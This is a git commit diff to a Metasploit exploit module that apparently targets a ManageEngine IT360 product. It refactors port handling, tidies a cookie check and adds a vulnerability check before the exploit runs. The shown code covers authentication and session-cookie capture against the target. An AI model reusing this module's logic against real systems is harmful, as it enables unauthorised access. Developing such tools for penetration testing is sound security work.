Avoid modify datastore options

bug/bundler_fix
jvazquez-r7 2015-01-19 17:11:31 -06:00
parent 3c0efe4a7e
commit ed26a2fd77
1 changed files with 16 additions and 13 deletions

View File

@ -170,10 +170,8 @@ class Metasploit3 < Msf::Exploit::Remote
}
end
sd_port = datastore['RPORT']
datastore['RPORT'] = port
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
@ -184,8 +182,6 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => vars_post
})
datastore['RPORT'] = sd_port
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
@ -211,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET'] != nil
if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
@ -230,6 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@ -371,6 +368,11 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}")
@ -379,6 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
cookie = login
end
if cookie == nil
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end